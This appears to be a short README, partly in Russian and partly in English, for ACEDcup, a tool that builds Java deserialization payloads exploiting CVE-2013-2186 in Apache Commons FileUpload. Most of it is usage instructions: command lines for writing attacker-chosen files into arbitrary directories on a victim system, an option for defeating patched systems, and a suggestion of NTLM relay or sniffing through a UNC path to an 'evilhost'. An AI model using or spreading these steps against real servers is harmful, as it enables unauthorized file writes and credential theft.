
Генератор пейлоадов для атаки с использованием бинарной десериализации Java через Commons FileUpload (CVE-2013-2186)
Инструмент ACEDcup — генератор полезной нагрузки для атаки на бинарную десериализацию Java (ACED)
Для Apache Commons FileUpload версии <= 1.3 (CVE-2013-2186) и Oracle JDK версии < 7u40
Атака работает даже на более новых версиях библиотеки или Java. Мы можем загрузить любое содержимое в любую директорию, но мы не можем контролировать имя файла (что-то вроде upload_f71d3547_72ed_4ae1_90fe_0d319115cd42_00000000.tmp) в этой ситуации. Однако в некоторых случаях это может быть полезно.
Также мы можем выполнить NTLM-relay/sniffing атаку (используя \\evilhost\any\path), если ваша цель работает на Windows OS.
1)At first, we create a serialized payload:
java -jar aced_cup.jar /path/payload /path/target /path/out 1
/path/payload - a path to a file with your payload
/path/target - a path to a file that will be created in your victim (this will be stored in the serialized payload)
/path/out - a path to a file with serialized payload
0 - turn off null-byte ending if you attack a patched system (with null-byte- by default)
2)Then we set the serialized payload to the serialized reader (if we want to test the vuln on your host) :
java -jar ser_reader serialized_payload.txt
ser_reader tries to deserialize the payload and because of a vulnerability in it's library, it creates a new file in the directory specified.
java -jar aced_cup.jar D:\\cup_exploit\\payload.txt /home/user/test/any_name.txt D:\\cup_exploit\\serialized_payload.txt
```java -jar ser_reader D:\cup_exploit\serialized_payload.txt````